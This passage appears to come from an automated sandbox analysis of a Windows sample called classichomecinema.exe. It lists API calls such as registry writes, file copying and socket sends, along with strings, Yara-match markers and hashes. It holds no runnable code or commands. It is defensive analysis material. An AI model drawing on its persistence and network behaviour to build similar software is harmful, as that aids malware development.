                                                                                        • RegSetValueExA.KERNEL32(?,classic_home_cinema_i56,00000000), ref: 004022EC
                                                                                        • RegCloseKey.KERNEL32(?), ref: 0040DC57
                                                                                        Strings
                                                                                        • classic_home_cinema_i56, xrefs: 00401E76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseValue
                                                                                        • String ID: classic_home_cinema_i56
                                                                                        • API String ID: 3132538880-2700033101
                                                                                        • Opcode ID: 4287fdbf53fc794595f1aed1c1d10a152eebe4ca104611573b2e0ccfdb467f27
                                                                                        • Instruction ID: abb10eb6e4bb699019dab5373a34cee33de05093fc496e8c800fed89ae831c8e
                                                                                        • Opcode Fuzzy Hash: 4287fdbf53fc794595f1aed1c1d10a152eebe4ca104611573b2e0ccfdb467f27
                                                                                        • Instruction Fuzzy Hash: 630181319095848FD7554B64AF65BE63B74E316340F1100BAE586772B3D63C0D4AEB1F
                                                                                        APIs
                                                                                        • RegSetValueExA.KERNEL32(?,classic_home_cinema_i56,00000000), ref: 004022EC
                                                                                        • RegCloseKey.KERNEL32(?), ref: 0040DC57
                                                                                        Strings
                                                                                        • classic_home_cinema_i56, xrefs: 00401E76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseValue
                                                                                        • String ID: classic_home_cinema_i56
                                                                                        • API String ID: 3132538880-2700033101
                                                                                        • Opcode ID: 75121968fd5ef4a19553090efa96eea6fe73361e7bcf2ad820954a38ba505515
                                                                                        • Instruction ID: 36ff87731a71f486ac3fab46f0b3d8485277f928bed09576c9e55bbfb23ba6dd
                                                                                        • Opcode Fuzzy Hash: 75121968fd5ef4a19553090efa96eea6fe73361e7bcf2ad820954a38ba505515
                                                                                        • Instruction Fuzzy Hash: FD01D1315095808FC7418BA4AF60AE63B74E306300B1000BAE186772B3D63C0D5AEF1E
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 235f107673443dc190cec384a7956e355a63a6fa6f988b7f9f38d46a6759e2de
                                                                                        • Instruction ID: 55d495cbf710b7d77a16d2708a889043931cc46192548ae19a3ce1db81c14a24
                                                                                        • Opcode Fuzzy Hash: 235f107673443dc190cec384a7956e355a63a6fa6f988b7f9f38d46a6759e2de
                                                                                        • Instruction Fuzzy Hash: 32515EB1904216EFCF18DF68D5516AABBB4FF08320F14815EF8299B382D774DA11CBA0
                                                                                        APIs
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00AB36A7
                                                                                          • Part of subcall function 00AB2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00AB2432
                                                                                          • Part of subcall function 00AB2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00AB2445
                                                                                          • Part of subcall function 00AB2420: RtlEnterCriticalSection.NTDLL(?), ref: 00AB2454
                                                                                          • Part of subcall function 00AB2420: InterlockedExchange.KERNEL32(?,00000001), ref: 00AB2469
                                                                                          • Part of subcall function 00AB2420: RtlLeaveCriticalSection.NTDLL(?), ref: 00AB2470
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1601054111-0
                                                                                        • Opcode ID: b4aa6f2a65ab516e39ad99536178505f1d346e8660fb3003a2c010debe0eab87
                                                                                        • Instruction ID: f5f0225326dac021eac9bcd1976359e123d1fc7512b1778c9c77393ec60c4a20
                                                                                        • Opcode Fuzzy Hash: b4aa6f2a65ab516e39ad99536178505f1d346e8660fb3003a2c010debe0eab87
                                                                                        • Instruction Fuzzy Hash: 4B11E7F6100208ABDF21DF54CC45FEA3BADEF05350F204116FE12CA692CB74D9A19B94
                                                                                        APIs
                                                                                        • __beginthreadex.LIBCMT ref: 00AC1106
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000002,00AB9985,00000000), ref: 00AC1137
                                                                                        • ResumeThread.KERNEL32(?,?,?,?,?,00000002,00AB9985,00000000), ref: 00AC1145
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleResumeThread__beginthreadex
                                                                                        • String ID:
                                                                                        • API String ID: 1685284544-0
                                                                                        • Opcode ID: 8b95f5f5a0ef942ccfb866243ed6ef3e795ab37ca4f15787da0755430f02c580
                                                                                        • Instruction ID: fdb5194742b01e5121ae2cb26c1f33046da4489dc877da8c514b48d7bb093909
                                                                                        • Opcode Fuzzy Hash: 8b95f5f5a0ef942ccfb866243ed6ef3e795ab37ca4f15787da0755430f02c580
                                                                                        • Instruction Fuzzy Hash: 88F0C274300200AFDB209FACDC80F95B3E8EF49325F29062EF254C7291C3B5EC828A90
                                                                                        APIs
                                                                                        • InterlockedIncrement.KERNEL32(00AE529C), ref: 00AB1ABA
                                                                                        • WSAStartup.WS2_32(00000002,00000000), ref: 00AB1ACB
                                                                                        • InterlockedExchange.KERNEL32(00AE52A0,00000000), ref: 00AB1AD7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked$ExchangeIncrementStartup
                                                                                        • String ID:
                                                                                        • API String ID: 1856147945-0
                                                                                        • Opcode ID: 66d272f0f0b7876379189feb5d4e2b03b7d0acf6851ac635b2e8b4d81ca75709
                                                                                        • Instruction ID: 40dc45aff4d808c931df1ec38a8da7f38344e60a06043e59574178f0609c7fdf
                                                                                        • Opcode Fuzzy Hash: 66d272f0f0b7876379189feb5d4e2b03b7d0acf6851ac635b2e8b4d81ca75709
                                                                                        • Instruction Fuzzy Hash: EDD05E31D45A046FD220BBF1AD0EAB87B6CE70A716F800656FE66C41D1EA51691085A6
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00AB4BF2
                                                                                          • Part of subcall function 00AB1BA7: __EH_prolog.LIBCMT ref: 00AB1BAC
                                                                                          • Part of subcall function 00AB1BA7: RtlEnterCriticalSection.NTDLL ref: 00AB1BBC
                                                                                          • Part of subcall function 00AB1BA7: RtlLeaveCriticalSection.NTDLL ref: 00AB1BEA
                                                                                          • Part of subcall function 00AB1BA7: RtlEnterCriticalSection.NTDLL ref: 00AB1C13
                                                                                          • Part of subcall function 00AB1BA7: RtlLeaveCriticalSection.NTDLL ref: 00AB1C56
                                                                                          • Part of subcall function 00ABD0F7: __EH_prolog.LIBCMT ref: 00ABD0FC
                                                                                          • Part of subcall function 00ABD0F7: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00ABD17B
                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 00AB4CF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                        • String ID:
                                                                                        • API String ID: 1927618982-0
                                                                                        • Opcode ID: 560a52164de4c452ff6f7ea95f6c6e21be8001f7cc90dcc6ca92da74a7a1f6ec
                                                                                        • Instruction ID: 0630d933407f25090d9db07559b9cde278df67fc64066a85a86104b7d272d173
                                                                                        • Opcode Fuzzy Hash: 560a52164de4c452ff6f7ea95f6c6e21be8001f7cc90dcc6ca92da74a7a1f6ec
                                                                                        • Instruction Fuzzy Hash: 99512671D04248DFDB15DFA8C995AEEBFB8EF08310F14816AE806AB353DB709A44CB51
                                                                                        APIs
                                                                                        • lstrcmpiW.KERNEL32(?,00409178), ref: 00401812
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID: hq~N
                                                                                        • API String ID: 1586166983-2856139384
                                                                                        • Opcode ID: 1408b6bc1364a524a577bb1ecb9208685e1e78e33e21863dad005ec10d89d2c5
                                                                                        • Instruction ID: 02c9e1440662b1061e397cefb6380b0f254cf22eb9495d952fe0c81fe0b57e01
                                                                                        • Opcode Fuzzy Hash: 1408b6bc1364a524a577bb1ecb9208685e1e78e33e21863dad005ec10d89d2c5
                                                                                        • Instruction Fuzzy Hash: 0D212430918285CBC7109BA9EE547E63BB0B706300F5481B5D585B62B3C33C8D4AEB0C
                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00AB2D47
                                                                                        • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 00AB2D5C
                                                                                          • Part of subcall function 00AB9505: WSAGetLastError.WS2_32(00000000,?,?,00AB2A51), ref: 00AB9513
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Send
                                                                                        • String ID:
                                                                                        • API String ID: 1282938840-0
                                                                                        • Opcode ID: efce0dbef11b7d9b644105f935a7ad2a5b2b74272824895171b6dfd1c6aa0746
                                                                                        • Instruction ID: d9ee502cc32006c64a449918778e65d161abef1f4c2a82aba1beed4002bb8025
                                                                                        • Opcode Fuzzy Hash: efce0dbef11b7d9b644105f935a7ad2a5b2b74272824895171b6dfd1c6aa0746
                                                                                        • Instruction Fuzzy Hash: 700184B5500205AFDB20AFA9DD459ABBBFCEF453A4720052FF95983201EB709D019761
                                                                                        APIs
                                                                                        • lstrcmpiW.KERNEL32(?,00409178), ref: 00401812
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe, xrefs: 00401B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi
                                                                                        • String ID: C:\Users\user\AppData\Local\Classic Home Cinema 2.1.12\classichomecinema.exe
                                                                                        • API String ID: 1586166983-2063213804
                                                                                        • Opcode ID: 73f53f1329700b03cf39f3da3dd474ad4c5c296959517e005705f258587d62e8
                                                                                        • Instruction ID: 37889ca4e6f963634dbb771ac37cc27f8cb514cf9ce9245705ad4c9862584455
                                                                                        • Opcode Fuzzy Hash: 73f53f1329700b03cf39f3da3dd474ad4c5c296959517e005705f258587d62e8
                                                                                        • Instruction Fuzzy Hash: 79014B31D10205CBD7109B59DE88B9977B4FB0A341F2080BAE549F62E1DB789E4ADB4C
                                                                                        APIs
                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                          • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                        • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                          • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocCreateDestroyVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2507506473-0
                                                                                        • Opcode ID: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                        • Instruction ID: 13181fdbc77bd6b5762d4953551df96dffaf81345f3f43d3ea23e6f05a00c699
                                                                                        • Opcode Fuzzy Hash: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                        • Instruction Fuzzy Hash: 58F065706547029ADB101F319E4572A3EA89B4075BF10447FFD00F51D1EFBC9784951D
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00AB511E
                                                                                          • Part of subcall function 00AB3D7E: htons.WS2_32(?), ref: 00AB3DA2
                                                                                          • Part of subcall function 00AB3D7E: htonl.WS2_32(00000000), ref: 00AB3DB9
                                                                                          • Part of subcall function 00AB3D7E: htonl.WS2_32(00000000), ref: 00AB3DC0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: htonl$H_prologhtons
                                                                                        • String ID:
                                                                                        • API String ID: 4039807196-0
                                                                                        • Opcode ID: 9317cac234aba1c3b99956b1bfb76be75bb3c9abeba734b5d38fe20455e7977c
                                                                                        • Instruction ID: 248b9c4a231968ef9a191a04373b117ebe2d0cb69e87bc673e2b3617ab95e1ea
                                                                                        • Opcode Fuzzy Hash: 9317cac234aba1c3b99956b1bfb76be75bb3c9abeba734b5d38fe20455e7977c
                                                                                        • Instruction Fuzzy Hash: CC814975D0424E8ECF05DFA8D190AEEBBF8EF48310F20815AD851BB242EA765A45CF61
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00ABD9C5
                                                                                          • Part of subcall function 00AB1A01: TlsGetValue.KERNEL32 ref: 00AB1A0A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: H_prologValue
                                                                                        • String ID:
                                                                                        • API String ID: 3700342317-0
                                                                                        • Opcode ID: 82348e04484e8ee50c8da58666bf775aaaedbc9b57f51c7619e041899d0a9e6b
                                                                                        • Instruction ID: b6bea9c03c347872202ffae1e3e25b1a285502e34ea29b33551c988164a0372a
                                                                                        • Opcode Fuzzy Hash: 82348e04484e8ee50c8da58666bf775aaaedbc9b57f51c7619e041899d0a9e6b
                                                                                        • Instruction Fuzzy Hash: A52121B2904209AFDB04DF95D541AEEBBFCEF49350F10411EE515A7242E775AA00DBA1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 0fd94987bcb25d7c377d2996674c6c4ad75bd9d17f6e3ebe7861f22310b9b88b
                                                                                        • Instruction ID: b943bf9dd02f481aa5c205b1905e0ba4ea34cd51cd036043cf3558cfe0d4bd24
                                                                                        • Opcode Fuzzy Hash: 0fd94987bcb25d7c377d2996674c6c4ad75bd9d17f6e3ebe7861f22310b9b88b
                                                                                        • Instruction Fuzzy Hash: F311E365A0D6818FC7018B74AF606E23BB4A716340B8410BAD0DAA7273D63C4D47EB1E
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00ABD555
                                                                                          • Part of subcall function 00AB26DB: RtlEnterCriticalSection.NTDLL(?), ref: 00AB2706
                                                                                          • Part of subcall function 00AB26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 00AB272B
                                                                                          • Part of subcall function 00AB26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00AD3163), ref: 00AB2738
                                                                                          • Part of subcall function 00AB26DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 00AB2778
                                                                                          • Part of subcall function 00AB26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 00AB27D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                        • String ID:
                                                                                        • API String ID: 4293676635-0
                                                                                        • Opcode ID: 67f1101348cb02834b029726b95c507ea74ef3b42a76a49239f457a5f7bfe99d
                                                                                        • Instruction ID: 30ebeb56b4c9bd635b5589afe2a52664b912e49256c3005f34614338496c22ce
                                                                                        • Opcode Fuzzy Hash: 67f1101348cb02834b029726b95c507ea74ef3b42a76a49239f457a5f7bfe99d
                                                                                        • Instruction Fuzzy Hash: F5019EB1910B14DFC728CF1AD540999FBE4FF88710B16C5AF944A9B722E7B1AA40CB94
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00ABD334
                                                                                          • Part of subcall function 00AC27B5: _malloc.LIBCMT ref: 00AC27CD
                                                                                          • Part of subcall function 00ABD550: __EH_prolog.LIBCMT ref: 00ABD555
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: H_prolog$_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 4254904621-0
                                                                                        • Opcode ID: bb91d1545742ffdbe79c4e63aa6db15319505e125f0568b94a55416661cedf98
                                                                                        • Instruction ID: 97598f68db83e28a0b3a7aa8e44e44eae8f6c582e505792581e784afe68ebc33
                                                                                        • Opcode Fuzzy Hash: bb91d1545742ffdbe79c4e63aa6db15319505e125f0568b94a55416661cedf98
                                                                                        • Instruction Fuzzy Hash: 34E08C71A00105ABCB19DF68D9127AD77A4EB44300F0046AEB80AD6341EB308A008651
                                                                                        APIs
                                                                                          • Part of subcall function 00AC48BA: __getptd_noexit.LIBCMT ref: 00AC48BB
                                                                                          • Part of subcall function 00AC48BA: __amsg_exit.LIBCMT ref: 00AC48C8
                                                                                          • Part of subcall function 00AC2493: __getptd_noexit.LIBCMT ref: 00AC2497
                                                                                          • Part of subcall function 00AC2493: __freeptd.LIBCMT ref: 00AC24B1
                                                                                          • Part of subcall function 00AC2493: RtlExitUserThread.NTDLL(?,00000000,?,00AC2473,00000000), ref: 00AC24BA
                                                                                        • __XcptFilter.LIBCMT ref: 00AC247F
                                                                                          • Part of subcall function 00AC7944: __getptd_noexit.LIBCMT ref: 00AC7948
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ab1000_classichomecinema.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                        • String ID:
                                                                                        • API String ID: 1405322794-0
                                                                                        • Opcode ID: 3b0600f51b08c862891ec26eb6d2868e48f423b9148bd73e984882a69f007489
                                                                                        • Instruction ID: 9d193704293b1329fb78564e518a94507be98a05d3bc665c182a3d67afd73ffc
                                                                                        • Opcode Fuzzy Hash: 3b0600f51b08c862891ec26eb6d2868e48f423b9148bd73e984882a69f007489
                                                                                        • Instruction Fuzzy Hash: E8E0ECB5944604AFEB08BBA0DA0AF2E77A5AF04311F21459DF1029B2A2CA749940DF24
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 0c72abbdb5a8916e4e24aebaccfaa2dc4555aad13b2a805eb269692c872dd74b
                                                                                        • Instruction ID: bb3ea7cc9101fcf5625ecd8c52feba8398713153468fd2575f0ccc666973f7e5
                                                                                        • Opcode Fuzzy Hash: 0c72abbdb5a8916e4e24aebaccfaa2dc4555aad13b2a805eb269692c872dd74b
                                                                                        • Instruction Fuzzy Hash: 56E0E574D01218DFCB14CE98D5A4BECB7B1BB08300F10806AE80277390D7395849DA19
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: CopyFile
                                                                                        • String ID:
                                                                                        • API String ID: 1304948518-0
                                                                                        • Opcode ID: c69ef31a7dd5daa9f4eddc9d810b040cbef82ecd0c1d190c9d93c4d740a89546
                                                                                        • Instruction ID: 27853292b9ebee26673c9e2a29a24e742e5dd7611a9ba99aca8ceaee4ed323a0
                                                                                        • Opcode Fuzzy Hash: c69ef31a7dd5daa9f4eddc9d810b040cbef82ecd0c1d190c9d93c4d740a89546
                                                                                        • Instruction Fuzzy Hash: 9DD0A7F0D0502CABC71496529E89EE7225CCB04B40F140077650AF20D2E67C8A496A3B
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555577941.0000000000AE8000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE8000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_ae8000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 5d1af92810e3336f48f7e051dcd9041a263417117cbc74df5e94e2152289242a
                                                                                        • Instruction ID: 6970130845bc06879a9beff4d9a11339f1730972e4c627a5eabdd29547dfb8b9
                                                                                        • Opcode Fuzzy Hash: 5d1af92810e3336f48f7e051dcd9041a263417117cbc74df5e94e2152289242a
                                                                                        • Instruction Fuzzy Hash: AFD092B041DA00CFD305AF59D484679BBF1EF88700F52882D92C582A18DA700081AA9B
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 4241100979-0
                                                                                        • Opcode ID: 6cee8c885636b5c7a1842f4f198ef58604c2e65a1783f243f6e934eccc6f75ac
                                                                                        • Instruction ID: 674d0c7ab9eb076612fc70335bf35aceca667704559374c7c7f61bf7c3824fc7
                                                                                        • Opcode Fuzzy Hash: 6cee8c885636b5c7a1842f4f198ef58604c2e65a1783f243f6e934eccc6f75ac
                                                                                        • Instruction Fuzzy Hash: 1EC012B4A8D128DAC206A6D64E08EFDB1684F09300F3004736587300D28AFC088A6AAF
                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNEL32(?), ref: 0040E063
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3660427363-0
                                                                                        • Opcode ID: a8de28602004eb34c581e09bfa0515beefc3a9b04618b09406c365c5d84848a7
                                                                                        • Instruction ID: 9e0b40aab8dab8ddf24eea744c943b127f270eb78f13ff0892a98b979a6b27b3
                                                                                        • Opcode Fuzzy Hash: a8de28602004eb34c581e09bfa0515beefc3a9b04618b09406c365c5d84848a7
                                                                                        • Instruction Fuzzy Hash: 0BB09230904129DACB114F718A0877E7A70BA40700B114D2AC462B1090C7B98112BA5A
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: CopyFile
                                                                                        • String ID:
                                                                                        • API String ID: 1304948518-0
                                                                                        • Opcode ID: 8f1124ad888b4c9081d48329b3ea00d471a1649e9795068a1de60722a707dddc
                                                                                        • Instruction ID: 4a60a1b0ca679bb79b7e450458cb74753b6a01bb9afd35d6987d8c6a1826db30
                                                                                        • Opcode Fuzzy Hash: 8f1124ad888b4c9081d48329b3ea00d471a1649e9795068a1de60722a707dddc
                                                                                        • Instruction Fuzzy Hash: ABA022A0E0C002FEE8A02FC00EAEF2222CC030030CFA080323303300C0083C000EEA2E
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3554963346.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3554963346.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: e66dba9bc5a59dec1b9cdc0a82b5261c8e6dde639c67a711cb867eaa7357f7a8
                                                                                        • Instruction ID: 3e4ad85b022d709214506f7c5254eb6a474fc2c7e84a93c50c55e0b9104debd3
